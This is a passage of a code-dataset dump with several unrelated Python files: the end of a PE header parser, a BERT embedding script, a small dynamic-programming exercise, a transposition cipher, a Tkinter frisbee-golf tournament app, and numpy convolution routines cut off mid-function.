\"(physical: \" + add_padding_str(RVA_to_offset(data,\n elements[name_of_variable],\n num_of_sections,\n pe_header_offset,\n opt_header_size), size) + \")\"\n\n output += '{: <5}{: <30}: {: <10} {: <25}\\n'.format(\"\", name_of_atribute, add_padding_str(elements[name_of_variable],size), phys_address)\n\n phys_address = \"\"\n\n output += 50 * \"-\" + \"\\n\"\n\n for i in range(len(self.tables)):\n output += '{: <5}{: <10} {: <4} {: <25}\\n'.format(\"\", add_padding_str(self.tables[i].rva, BYTES_4), \"RVA\",\n data_dir_names[i])\n output += '{: <5}{: <10} {: <4}\\n'.format(\"\", add_padding_str(self.tables[i].size, BYTES_4), \"Size\")\n output += 50 * \"-\" + \"\\n\"\n\n output += \"\\n\"\n\n return output\n\n\n# section header structure\nclass Section_header:\n def __init__(self, data, pointer):\n self.name = little_endian(data, pointer, BYTES_8)\n self.virt_size = little_endian(data, pointer + 8, BYTES_4)\n self.rva = little_endian(data, pointer + 12, BYTES_4)\n self.size_raw = little_endian(data, pointer + 16, BYTES_4)\n self.pointer_raw = little_endian(data, pointer + 20, BYTES_4)\n self.pointer_reloc = little_endian(data, pointer + 24, BYTES_4)\n self.pointer_line_mem = little_endian(data, pointer + 28, BYTES_4)\n self.num_reloc = little_endian(data, pointer + 32, BYTES_2)\n self.num_line_num = little_endian(data, pointer + 34, BYTES_2)\n self.characteristics = little_endian(data, pointer + 36, BYTES_4)\n\n # formated output for every part of the section header returned as a string\n def write(self):\n output = \"\"\n elements = vars(self)\n name_str = string_from_int_representation_of_hex(self.name)\n name_of_atribute = section_param[0][0]\n output += '{: <5}{: <25}: {:<8}\\n'.format(\"\", name_of_atribute, name_str)\n\n for i in range(1, len(elements)):\n name_of_atribute = section_param[i][0]\n name_of_variable = section_param[i][1]\n size = section_param[i][2]\n output += '{: <5}{: <25}: {:<10}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable],\n size))\n\n output += \"\\n\"\n\n return output\n\n\nclass import_directory:\n def __init__(self, data,pointer):\n self.import_lookup_rva = little_endian(data, pointer, BYTES_4)\n self.stamp = little_endian(data, pointer + 4, BYTES_4)\n self.chain = little_endian(data, pointer + 8, BYTES_4)\n self.name_rva = little_endian(data, pointer + 12, BYTES_4)\n self.import_addr_rva = little_endian(data, pointer + 16, BYTES_4)\n\n def write(self, data, num_of_sections, pe_header_offset, opt_header_size):\n output = format_string(\"Import Directory\", 1)\n elements = vars(self)\n\n for i in range(len(elements)):\n phis_addr = \"\"\n name_of_atribute = import_table_names[i][0]\n name_of_variable = import_table_names[i][1]\n size = import_table_names[i][2]\n should_display_phis_addr = name_of_atribute in (\"Import Lookup Table RVA\", \"Name RVA\", \"Import Address Table RVA\") and \\\n elements[name_of_variable] != 0\n\n if should_display_phis_addr:\n phis_addr = \"(phisycal: \" + add_padding_str(RVA_to_offset(data, elements[name_of_variable],\n num_of_sections, pe_header_offset, opt_header_size),size) + \")\"\n\n if name_of_atribute == \"Name RVA\":\n phis_addr += \" --> \" + get_dll_name(self.name_rva, data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += '{}{: <25}: {: <10} {}\\n'.format(INDENT * 2 * \" \", name_of_atribute,add_padding_str(elements[name_of_variable], size), phis_addr)\n\n\n if self.import_lookup_rva == 0:\n return output\n\n output += format_string(\"Import Thunks\", 2)\n\n phis_thunk = RVA_to_offset(data, self.import_lookup_rva, num_of_sections, pe_header_offset, opt_header_size)\n value = little_endian(data, phis_thunk, BYTES_4)\n counter = 0\n\n while value != 0:\n if value & (1 << 31):\n ordinal = value & 0xffff\n output += '{}Api: {:<10} {:<7}: {:<4}\\n'.format(3 * INDENT * \" \", add_padding_str(value, BYTES_4), \"Ordinal\",\n add_padding_str(ordinal, BYTES_2))\n\n else:\n hint = little_endian(data, RVA_to_offset(data, value, num_of_sections, pe_header_offset, opt_header_size), BYTES_2)\n name = get_dll_name(value + 2, data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += '{}Api: {:<10} (physical: {:<10}) --> hint: {:<6}, name: {:<20}\\n'.format(3 * INDENT * \" \",\n add_padding_str(value, BYTES_4),\n add_padding_str(RVA_to_offset(data,\n value,\n num_of_sections,\n pe_header_offset,\n opt_header_size),\n BYTES_4),\n add_padding_str(hint, BYTES_2), name)\n\n counter += 1\n value = little_endian(data, phis_thunk + 4 * counter, BYTES_4)\n\n output += \"\\n\"\n\n return output\n\n\nclass Export_directory:\n def __init__(self, data, pointer):\n self.characteristics = little_endian(data, pointer, BYTES_4)\n self.time_date_stamp = little_endian(data, pointer + 4, BYTES_4)\n self.maj_version = little_endian(data, pointer + 8, BYTES_2)\n self.min_version = little_endian(data, pointer + 10, BYTES_2)\n self.name_rva = little_endian(data, pointer + 12, BYTES_4)\n self.ordinal_base = little_endian(data, pointer + 16, BYTES_4)\n self.num_of_functions = little_endian(data, pointer + 20, BYTES_4)\n self.num_of_names = little_endian(data, pointer + 24, BYTES_4)\n self.addr_table_rva = little_endian(data, pointer + 28, BYTES_4)\n self.name_pointer_rva = little_endian(data, pointer + 32, BYTES_4)\n self.ordinal_table_rva = little_endian(data, pointer + 36, BYTES_4)\n\n def write(self, data,num_of_sections, pe_header_offset, opt_header_size, export_dir):\n output = format_string(\"Export Table\", 0) + format_string(\"Export Directory\", 1)\n elements = vars(self)\n phis_addr = \"\"\n\n\n for i in range(len(elements)):\n name_of_attribute = export_table_names[i][0]\n name_of_variable = export_table_names[i][1]\n size = export_table_names[i][2]\n\n if name_of_attribute in (\"Name RVA\",\n \"Address Table RVA\",\n \"Name Pointer Table RVA\",\n \"Ordinal Table RVA\"):\n phis_addr = \"(physical: \" + add_padding_str(RVA_to_offset(data, elements[name_of_variable],\n num_of_sections, pe_header_offset, opt_header_size), size) + \")\"\n if export_table_names[i][0] == \"Name RVA\":\n phis_addr += \"--> \" + get_dll_name(self.name_rva, data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += '{}{:<30} {:<10} {}\\n'.format(INDENT * \" \", name_of_attribute,\n add_padding_str(elements[name_of_variable],size),phis_addr)\n phis_addr = \"\"\n\n ordinals = []\n names = []\n output_second = format_string(\"Export Function Name Table\", 2)\n output_third = format_string(\"Export Ordinal Table\", 2)\n\n for i in range(self.num_of_names):\n pointer = little_endian(data, RVA_to_offset(data, self.name_pointer_rva + BYTES_4 * i,\n num_of_sections, pe_header_offset, opt_header_size), BYTES_4)\n name_str = get_dll_name(pointer, data, num_of_sections, pe_header_offset, opt_header_size)\n ordinal=little_endian(data, RVA_to_offset(data, self.ordinal_table_rva + BYTES_2 * i,\n num_of_sections, pe_header_offset, opt_header_size),BYTES_2) + self.ordinal_base\n output_second += '{}API: {: <10} (phisycal: {}) --> Ordinal: {: <6}, Name: {}\\n'.format(INDENT * 3 * \" \",\n add_padding_str(pointer,BYTES_4),\n add_padding_str(RVA_to_offset(\n data,\n pointer,\n num_of_sections,\n pe_header_offset,\n opt_header_size),BYTES_4),\n add_padding_str(ordinal,BYTES_2),name_str)\n output_third += '{}Value: {: <6} (decoded ordinal: {: <6}), Name: {}\\n'.format(INDENT * 3 * \" \",\n add_padding_str(ordinal - self.ordinal_base,BYTES_2),\n add_padding_str(ordinal,BYTES_2),name_str)\n ordinals.append(ordinal)\n names.append((name_str, pointer))\n\n output += \"\\n\" + format_string(\"Export Address Table\", 2)\n\n for i in range(self.num_of_functions):\n ordinal_ordered = self.ordinal_base + i\n address = little_endian(data, RVA_to_offset(data, self.addr_table_rva + BYTES_4 * i,\n num_of_sections, pe_header_offset, opt_header_size), BYTES_4)\n physical = RVA_to_offset(data,address,num_of_sections,pe_header_offset,opt_header_size)\n\n if address == 0:\n output += '{}{: <10} (physical: {: <10})\\n'.format(INDENT * 3 * \" \",add_padding_str(address, BYTES_4), add_padding_str(physical, BYTES_4))\n\n else:\n is_in_export_dir = export_dir.rva <= address <= export_dir.rva + export_dir.size\n\n if is_in_export_dir:\n dll_name = get_dll_name(address, data, num_of_sections, pe_header_offset, opt_header_size)\n\n else:\n if ordinal_ordered not in ordinals:\n dll_name = \"\"\n\n else:\n dll_name = names[ordinals.index(ordinal_ordered)][0]\n\n output += '{}API: {: <10} (physical: {: <10}) --> Ordinal: {: <6}, Name: {}\\n'.format(INDENT * 3 * \" \", add_padding_str(address, BYTES_4),\n add_padding_str(physical, BYTES_4),\n add_padding_str(ordinal_ordered, BYTES_2),\n dll_name)\n\n output += output_second + \"\\n\" + output_third\n\n return output\n\n\nif __name__ == '__main__':\n # variable from where we will print the output\n output = \"\"\n\n # open a file and read the bytes from it\n file_name = input(\"Write PE path:\")\n file = open(file_name, \"rb\")\n data = file.read()\n\n # load the mz header, check if it is correct and write it to output\n mz = MZ_header(data, 0)\n mz.check()\n output += mz.write()\n\n # load the pe header, check if it is correct and write it to output\n pe = PE_header(data, mz.new_header_offset)\n pe.check()\n output += pe.write()\n\n # load the optional header, check if it is correct and write it to output\n opt = Optional_header(data, mz.new_header_offset + SIZE_OF_PE)\n opt.check()\n output += opt.write(data, pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header)\n\n #load the section headers and write them to output\n sect = []\n\n for i in range(pe.num_of_sections):\n sect.append(\n Section_header(data, mz.new_header_offset + SIZE_OF_PE + pe.size_of_opt_header + i * SIZE_OF_SECTION_HEADER))\n\n output += section_headers_merge(sect)\n\n # load the imports and write them to output\n import_dirs = []\n imports = opt.tables[1]\n\n for i in range(int(imports.size / SIZE_OF_IMPORT_DIRECTORY)):\n import_dirs.append(import_directory(data, RVA_to_offset(data, imports.rva + i * SIZE_OF_IMPORT_DIRECTORY,\n pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header)))\n\n output += imports_merge(import_dirs, data,pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header)\n\n #load the exports and write them to output\n exports = opt.tables[0]\n\n if exports.size != 0:\n export_dir = Export_directory(data, RVA_to_offset(data, exports.rva, pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header))\n output += export_dir.write(data, pe.num_of_sections, mz.new_header_offset, pe.size_of_opt_header, exports)\n\n print(output)\n #write=open(\"out.txt\",\"w\")\n #write.write(output)\n #write.close()\n file.close()\n","repo_name":"facafile/Reverse-Engineering","sub_path":"PE Parser 32bit/PE_Parser.py","file_name":"PE_Parser.py","file_ext":"py","file_size_in_byte":32391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6063404616","text":"import re\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom transformers import BertModel, BertTokenizer\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nVEC_LEN = 768\n\n\nclass v2g_Model(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n self.bert = BertModel.from_pretrained(\"bert-base-uncased\")\n self.w_mu = nn.Linear(VEC_LEN, VEC_LEN)\n self.w_var = nn.Linear(VEC_LEN, VEC_LEN)\n\n def __call__(self, *args, **kwds):\n return super().__call__(*args, **kwds)\n\n def forward(self, input_ids, attention_mask):\n outputs = self.bert(input_ids, attention_mask)\n emb = outputs.last_hidden_state[:, 0]\n var = self.w_var(emb).exp()\n mu = self.w_mu(emb)\n return mu, var\n\n\ntrain_f = open(\"./data/wikisub.txt\")\ntrain_S = train_f.readlines()\ntrain_S = train_S[:5]\ntrain_S_d = []\nfor i in train_S:\n train_S_d.append(i)\n train_S_d.append(i)\n\ntokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\ninputs = tokenizer(train_S_d, padding=True, truncation=True)\ninput_ids = torch.from_numpy(np.array(inputs.input_ids).astype(np.float32)).clone()\ninput_ids = input_ids.to(torch.long)\nattention_mask = torch.from_numpy(np.array(inputs.attention_mask).astype(np.float32)).clone()\nattention_mask = attention_mask.to(torch.long)\nv2g = v2g_Model()\nv2g.eval()\nmu, var = v2g(input_ids, attention_mask)\n\nprint(mu)\nprint(var)\n","repo_name":"hpp-playground/python-playground","sub_path":"src/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21874770010","text":"'''\n3\n3\n111\n4\n1101\n5\n11111\n'''\nT = int(input())\nfor tc in range(T):\n input()\n M = list(map(int,list(input())))\n dp = [0]*len(M)\n dp[0] = 1\n for i in range(1,len(M)):\n if M[i] == 1:\n dp[i] = dp[i-1]\n if i-2 >= 0:\n dp[i] += dp[i-2]\n else:\n dp[i] = 0\n print(dp[len(M)-1])","repo_name":"Rekalux/Algorithm-etc","sub_path":"Only Algorithm/Year2021/Day0320/scofe_1.py","file_name":"scofe_1.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24449113388","text":"import numpy as np\nfrom datetime import datetime\n\ndef form_matrix(message : str, route_step : int) -> np.ndarray:\n message_len = len(message)\n if message_len % route_step != 0:\n message += ' ' * (route_step - message_len % route_step)\n matrix = np.array(list(message))\n matrix = matrix.reshape(route_step, -1)\n return matrix\n\ndef encrypt(message : str, route_step : int) -> str:\n matrix = form_matrix(message, route_step)\n print('Таблица:')\n for row in matrix:\n print(row)\n res = ''\n i, j = matrix.shape\n for column in range(j):\n if column % 2 == 0:\n for row in reversed(range(i)):\n res += matrix[row, column]\n else:\n for row in range(i):\n res += matrix[row, column]\n return(res)\n\ndef decrypt(message: str, route_step : int) -> str:\n message_len = len(message)\n if message_len % route_step != 0:\n message += ' ' * (route_step - message_len % route_step)\n matrix = np.empty((route_step, message_len // route_step), dtype=str)\n i, j = matrix.shape\n for column in range(j):\n if column % 2 == 0:\n for row in reversed(range(i)):\n letter = message[0]\n message = message[1:]\n matrix[row, column] = letter\n else:\n for row in (range(i)):\n letter = message[0]\n message = message[1:]\n matrix[row, column] = letter\n print('Таблица:')\n for row in matrix:\n print(row)\n res = ''.join(matrix.ravel())\n return res\n\n# словарь {символ:количество потворений этого символа} отсортированный по ключу\ndef get_letters_amount(seq):\n letters_dictionary = {}\n for i in seq:\n if i.isalpha():\n if i not in letters_dictionary:\n letters_dictionary[i] = 0\n letters_dictionary[i] += 1\n return dict(sorted(letters_dictionary.items()))\n\ndef zigzag_route_cipher(message: str, route_step : int):\n start_time = datetime.now()\n encrypted = encrypt(message, route_step)\n encrypt_time = datetime.now() - start_time\n print('Зашифрованное сообщение', encrypted)\n start_time = datetime.now()\n decrypted = decrypt(encrypted, route_step)\n decrypt_time = datetime.now() - start_time\n print('Расшифрованное сообщение:', decrypted)\n print('Время зашифрования:', encrypt_time)\n print('Время расшифрования:', decrypt_time)\n return get_letters_amount(encrypted)","repo_name":"ne-vera/ZIiNIS-6sem","sub_path":"ЛР 3. Шифры перестановки/lab3/zigzag_route_cipher.py","file_name":"zigzag_route_cipher.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"3064662623","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.font as font\nfrom PIL import ImageTk\nimport sqlite3\n\n#constants\nbgcolor = \"#34495E\"\n\n#hae turnausten nimet\ndef hae_turnaus():\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(f\"SELECT name FROM Events;\")\n turnaus = cursor.fetchall()\n connection.close()\n return turnaus\n\n#tulosta turnauksen osallistujat\ndef hae_turnaustiedot(nykyvalinta):\n tunnus = (nykyvalinta,)\n query = '''\n SELECT\n Events.ScheduleDate AS Pvm,\n Courses.Name AS Rata,\n Courses.Holecount,\n Players.FirstName AS Etunimi,\n Players.LastName AS Sukunimi,\n Scores.Score AS Pisteet\n FROM\n Events\n INNER JOIN Courses ON Courses.CourseID = Events.CourseID\n INNER JOIN Participants ON Participants.EventID = Events.EventID\n INNER JOIN Players ON Players.PlayerID = Participants.PlayerID\n INNER JOIN Scores ON Scores.PlayerID = Participants.PlayerID\n WHERE Events.Name = ?;\n '''\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query, tunnus)\n osallistujat = cursor.fetchall()\n osallistujat.sort(key = lambda x: x[5], reverse=True)\n connection.close()\n return osallistujat\n\ndef hae_pelaajat():\n query = '''\n SELECT \n *\n FROM\n Players;\n '''\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query)\n osallistujat = cursor.fetchall()\n osallistujat.sort(key = lambda x: x[0])\n connection.close()\n return osallistujat\n\ndef hae_radat():\n query = '''\n SELECT \n *\n FROM\n Courses;\n '''\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query)\n radat = cursor.fetchall()\n radat.sort(key = lambda x: x[0])\n connection.close()\n return radat\n\ndef lisaa_pelaaja():\n \n def pelaajalisays():\n query = '''\n INSERT INTO Players\n (FirstName, LastName, Handicap)\n VALUES (?, ?, ?);\n '''\n tiedot = (fn_entry.get(), ln_entry.get(), int(hc_entry.get()),)\n print(\"lisäysvaluet\", tiedot)\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query, tiedot)\n connection.commit()\n connection.close()\n \n\n lisaa_otsikko = tk.Label(contentwindow, text=\"Uusi Pelaaja:\", bg=bgcolor, fg=\"white\")\n lisaa_otsikko.pack(side=\"top\")\n\n fn_text = tk.Label(contentwindow, text=\"Etunimi\", bg=bgcolor, fg=\"white\")\n fn_entry = Entry(contentwindow, width=25)\n\n ln_text = tk.Label(contentwindow, text=\"Sukunimi\", bg=bgcolor, fg=\"white\")\n ln_entry = Entry(contentwindow, width=25)\n \n hc_text = tk.Label(contentwindow, text=\"Handicap\", bg=bgcolor, fg=\"white\")\n hc_entry = Entry(contentwindow, width=25)\n\n fn_text.pack(side=\"left\")\n fn_entry.pack(side=\"left\")\n\n ln_text.pack(side=\"left\")\n ln_entry.pack(side=\"left\")\n\n hc_text.pack(side=\"left\")\n hc_entry.pack(side=\"left\")\n \n\n vahvista = tk.Button(\n contentwindow,\n text=\"lisää Pelaaja\",\n command=pelaajalisays,\n )\n vahvista.pack(side='top', padx=5)\n\n \n\n#pääframe \ndef lataa_mainwindow():\n\n #prevent child modifying parent\n mainwindow.pack_propagate(False)\n\n #logo\n logo_img = ImageTk.PhotoImage(file=\"logo.png\")\n logo_widget = tk.Label(mainwindow, image=logo_img, bg=bgcolor)\n logo_widget.image = logo_img\n logo_widget.pack(pady=20)\n\n #Otsikko\n tk.Label(\n mainwindow,\n text = \"Frisbeegolf Turnaukset\",\n bg = bgcolor,\n fg = \"white\",\n font = (\"Consolas\", 20)\n ).pack()\n\n #nappula1\n valikko_fontti = font.Font(family='Consolas', size=12)\n nykvalinta = StringVar()\n nykvalinta.set(\"Valitse turnaus\")\n turnausvalinnat = OptionMenu(\n mainwindow,\n nykvalinta,\n *kaikki_turnaukset,\n command=lataa_contentwindow\n )\n turnausvalinnat['font'] = valikko_fontti\n turnausvalinnat.pack(pady=5)\n\n teksti = tk.Label(\n mainwindow,\n text=\"kaikki:\",\n bg = bgcolor,\n fg = \"white\",\n font = (\"Consolas\", 15, 'bold')\n )\n teksti.place(x=50, y=140)\n\n nappi_fontti = font.Font(family='Consolas', size=10)\n #nappula2 \n pelaajat = Button(\n mainwindow,\n text = \"Pelaajat\",\n command=lataa_pelaajawindow\n )\n pelaajat['font'] = nappi_fontti\n pelaajat.place(x=55,y=165)\n\n #nappula3\n radat = Button(\n mainwindow,\n text = \"Radat\",\n command=lataa_ratawindow\n )\n radat['font'] = nappi_fontti\n radat.place(x=55,y=195)\n\ndef tyhjenna_tiedot(kentta):\n for data in kentta.winfo_children():\n data.destroy()\n\ndef lataa_contentwindow(valinta):\n tyhjenna_tiedot(contentwindow)\n tulostus_data = ttk.Treeview(contentwindow)\n #kentät\n tulostus_data['columns'] = (\"pvm\", \"Etunimi\", \"Sukunimi\", \"Pisteet\")\n #format columns, anchor=W(west,vasen reuna)\n tulostus_data.column(\"#0\", width = 0, stretch=NO)\n tulostus_data.column(\"pvm\", anchor=W, width = 120)\n tulostus_data.column(\"Etunimi\", anchor=W, width = 120)\n tulostus_data.column(\"Sukunimi\", anchor=W, width = 120)\n tulostus_data.column(\"Pisteet\", anchor=CENTER, width = 120)\n #Otsikot\n tulostus_data.heading(\"#0\", text=\"\", anchor=W)\n tulostus_data.heading(\"pvm\", text=\"Päivämäärä\", anchor=W)\n tulostus_data.heading(\"Etunimi\", text=\"Etunimi\", anchor=W)\n tulostus_data.heading(\"Sukunimi\", text=\"Sukunimi\", anchor=W)\n tulostus_data.heading(\"Pisteet\", text=\"Pisteet\", anchor=CENTER)\n\n #lisää tiedot\n tiedot = hae_turnaustiedot(valinta)\n idx = 0\n for tieto in tiedot: \n tulostus_data.insert(parent='', index='end', iid=idx, text=\"\", values=(tieto[0], tieto[3], tieto[4], tieto[5]))\n idx += 1\n radan_fontti = font.Font(family='Consolas', size=15, weight='bold')\n radan_nimi = tk.Label(\n contentwindow,\n text = f\"Rata: {str(tieto[1])}\\n Väyliä: {tieto[2]}\",\n bg = bgcolor,\n fg = \"white\"\n )\n radan_nimi['font'] = radan_fontti\n radan_nimi.pack()\n tulostus_data.pack()\n\ndef lataa_pelaajawindow():\n tyhjenna_tiedot(contentwindow)\n pelaajat_data = ttk.Treeview(contentwindow)\n #kentät\n pelaajat_data['columns'] = (\"Playerid\", \"Etunimi\", \"Sukunimi\", \"Handicap\")\n pelaajat_data.column(\"#0\", width = 0, stretch=NO)\n pelaajat_data.column(\"Playerid\", anchor=W, width = 120)\n pelaajat_data.column(\"Etunimi\", anchor=W, width = 120)\n pelaajat_data.column(\"Sukunimi\", anchor=W, width = 120)\n pelaajat_data.column(\"Handicap\", anchor=W, width = 120)\n \n #Otsikot\n pelaajat_data.heading(\"#0\", text=\"\", anchor=W)\n pelaajat_data.heading(\"Playerid\", text=\"Pelaajatunnus\", anchor=W)\n pelaajat_data.heading(\"Etunimi\", text=\"Etunimi\", anchor=W)\n pelaajat_data.heading(\"Sukunimi\", text=\"Sukunimi\", anchor=W)\n pelaajat_data.heading(\"Handicap\", text=\"Handicap\", anchor=W)\n \n tiedot = hae_pelaajat()\n idx = 0\n for tieto in tiedot: \n pelaajat_data.insert(parent='', index='end', iid=idx, text=\"\", values=(tieto[0], tieto[1], tieto[2], tieto[3]))\n idx += 1\n pelaajat_data.pack(pady=5)\n\n lisaa_pelaaja()\n\n\ndef lataa_ratawindow():\n tyhjenna_tiedot(contentwindow)\n radat_data = ttk.Treeview(contentwindow)\n #kentät\n radat_data['columns'] = (\"Ratatunnus\", \"Nimi\", \"HoleCount\", \"CoursePar\", \"CourseRating\", \"BogeyRating\", \"SlopeRating\" )\n radat_data.column(\"#0\", width = 0, stretch=NO)\n radat_data.column(\"Ratatunnus\", anchor=W, width = 120)\n radat_data.column(\"Nimi\", anchor=W, width = 120)\n radat_data.column(\"HoleCount\", anchor=W, width = 120)\n radat_data.column(\"CoursePar\", anchor=W, width = 120)\n radat_data.column(\"CourseRating\", anchor=W, width = 120)\n radat_data.column(\"BogeyRating\", anchor=W, width = 120)\n radat_data.column(\"SlopeRating\", anchor=W, width = 120)\n\n radat_data.heading(\"#0\", text=\"\", anchor=W)\n radat_data.heading(\"Ratatunnus\", text=\"Ratatunnus\", anchor=W)\n radat_data.heading(\"Nimi\", text=\"Nimi\", anchor=W)\n radat_data.heading(\"HoleCount\", text=\"Väyliä\", anchor=W)\n radat_data.heading(\"CoursePar\", text=\"Par\",anchor=W)\n radat_data.heading(\"CourseRating\", text=\"Rata-Rating\", anchor=W)\n radat_data.heading(\"BogeyRating\", text=\"Bogey-Rating\", anchor=W)\n radat_data.heading(\"SlopeRating\", text=\"Slope-Rating\", anchor=W)\n\n radat = hae_radat()\n idx = 0\n for tieto in radat: \n radat_data.insert(parent='', index='end', iid=idx, text=\"\", values=(tieto[0],tieto[1],tieto[2],tieto[3],tieto[4],tieto[5],tieto[6]))\n idx += 1\n radat_data.pack()\n\n \n\n\n#init app\napp = tk.Tk()\n#title\napp.title(\"Turnaussovellus\")\n#center app window (tcl - tkinter :: windowmethod . top level, center)\napp.eval(\"tk::PlaceWindow . center\")\n#deny resize\napp.resizable(False,False)\n#turnaukset\nkaikki_turnaukset = hae_turnaus()\nkaikki_turnaukset = [\"\".join(ele) for ele in kaikki_turnaukset]\n#pelaajat\nkaikki_pelaajat = hae_pelaajat()\n\n\n#frames (appname,leveys,korkeus,tausta)\nmainwindow = tk.Frame(app, width=900, height=700, bg=bgcolor)\ncontentwindow = tk.Frame(app, bg=bgcolor)\nlisayswindow = tk.Frame(app, bg=bgcolor)\n\nmainwindow.grid(row=0, column=0)\ncontentwindow.grid(row=0, column=0)\nlisayswindow.grid(row=1,column=0)\n\n\n#header content\nlataa_mainwindow()\n#mainloop\napp.mainloop()","repo_name":"JoniObradovic/Frisbeegolf-Portaali","sub_path":"friba_ui.py","file_name":"friba_ui.py","file_ext":"py","file_size_in_byte":9650,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14118668803","text":"import numpy as np\n\n\n# 全连接层前向传播\ndef fc_forward(w, x, b):\n return np.dot(w, x) + b\n\n\ndef fc_backward(next_dz, W, z):\n \"\"\"\n 全连接层的反向传播\n :param next_dz: 下一层的梯度\n :param W: 当前层的权重\n :param z: 当前层的输出\n :return:\n \"\"\"\n N = z.shape[1]\n dz = np.dot(next_dz.T, W) # 当前层的梯度\n dw = np.dot(z, next_dz.T).T # 当前层权重的梯度\n db = np.sum(next_dz, axis=1, keepdims=True) # 当前层偏置的梯度, N个样本的梯度求和\n return dw / N, db / N, dz\n\n\ndef _conv_forward(z, K, b, padding=(0, 0)):\n \"\"\"\n 多通道卷积前向过程\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param K: 卷积核,形状(C,D,k1,k2), C为输入通道数,D为输出通道数\n :param b: 偏置,形状(D,)\n :param padding: padding\n :return: conv_z: 卷积结果[N,D,oH,oW]\n \"\"\"\n padding_z = np.lib.pad(z, ((0, 0), (0, 0), (padding[0], padding[0]), (padding[1], padding[1])), 'constant',\n constant_values=0)\n N, _, height, width = padding_z.shape\n C, D, k1, k2 = K.shape\n oh, ow = (1 + (height - k1), 1 + (width - k2)) # 输出的高度和宽度\n\n # 扩维\n padding_z = padding_z[:, :, np.newaxis, :, :] # 扩维[N,C,1,H,W] 与K [C,D,K1,K2] 可以广播\n conv_z = np.zeros((N, D, oh, ow))\n\n # 批量卷积\n if k1 * k2 < oh * ow * 10:\n K = K[:, :, :, :, np.newaxis, np.newaxis]\n for c in range(C):\n for i in range(k1):\n for j in range(k2):\n # [N,1,oh,ow]*[D,1,1] =>[N,D,oh,ow]\n conv_z += padding_z[:, c, :, i:i + oh, j:j + ow] * K[c, :, i, j]\n else: # 大卷积核,遍历空间更高效\n # print('大卷积核,遍历空间更高效')\n for c in range(C):\n for h in range(oh):\n for w in range(ow):\n # [N,1,k1,k2]*[D,k1,k2] =>[N,D,k1,k2] => [N,D]\n conv_z[:, :, h, w] += np.sum(padding_z[:, c, :, h:h + k1, w:w + k2] * K[c], axis=(2, 3))\n\n # 增加偏置 [N, D, oh, ow]+[D, 1, 1]\n conv_z += b[:, np.newaxis, np.newaxis]\n return conv_z\n\n\ndef conv_forward(z, K, b, padding=(0, 0), strides=(1, 1)):\n \"\"\"\n 多通道卷积前向过程\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param K: 卷积核,形状(C,D,k1,k2), C为输入通道数,D为输出通道数\n :param b: 偏置,形状(D,)\n :param padding: padding\n :param strides: 步长\n :return: conv_z: 卷积结果[N,D,oH,oW]\n oH = (H+2padding-k1)/strides+1\n oW = (W+2padding-k2)/strides+1\n \"\"\"\n # 长宽方向步长\n sh, sw = strides\n origin_conv_z = _conv_forward(z, K, b, padding)\n # origin_conv_z = c_conv_forward(z, K, b, padding) # 使用cython\n # 步长为1时的���出卷积尺寸\n N, D, oh, ow = origin_conv_z.shape\n if sh * sw == 1:\n return origin_conv_z\n # 高度方向步长大于1\n elif sw == 1:\n conv_z = np.zeros((N, D, oh // sh, ow))\n for i in range(oh // sh):\n conv_z[:, :, i, :] = origin_conv_z[:, :, i * sh, :]\n return conv_z\n # 宽度方向步长大于1\n elif sh == 1:\n conv_z = np.zeros((N, D, oh, ow // sw))\n for j in range(ow // sw):\n conv_z[:, :, :, j] = origin_conv_z[:, :, :, j * sw]\n return conv_z\n # 高度宽度方向步长都大于1\n else:\n conv_z = np.zeros((N, D, oh // sh, ow // sw))\n for i in range(oh // sh):\n for j in range(ow // sw):\n conv_z[:, :, i, j] = origin_conv_z[:, :, i * sh, j * sw]\n return conv_z\n\n\ndef _insert_zeros(dz, strides):\n \"\"\"\n 想多维数组最后两位,每个行列之间增加指定的个数的零填充\n :param dz: (N,D,H,W),H,W为卷积输出层的高度和宽度\n :param strides: 步长\n :return:\n \"\"\"\n _, _, H, W = dz.shape\n pz = dz\n if strides[0] > 1:\n for h in np.arange(H - 1, 0, -1):\n for o in np.arange(strides[0] - 1):\n pz = np.insert(pz, h, 0, axis=2)\n if strides[1] > 1:\n for w in np.arange(W - 1, 0, -1):\n for o in np.arange(strides[1] - 1):\n pz = np.insert(pz, w, 0, axis=3)\n return pz\n\n\ndef _remove_padding(z, padding):\n \"\"\"\n 移除padding\n :param z: (N,C,H,W)\n :param paddings: (p1,p2)\n :return:\n \"\"\"\n if padding[0] > 0 and padding[1] > 0:\n return z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]\n elif padding[0] > 0:\n return z[:, :, padding[0]:-padding[0], :]\n elif padding[1] > 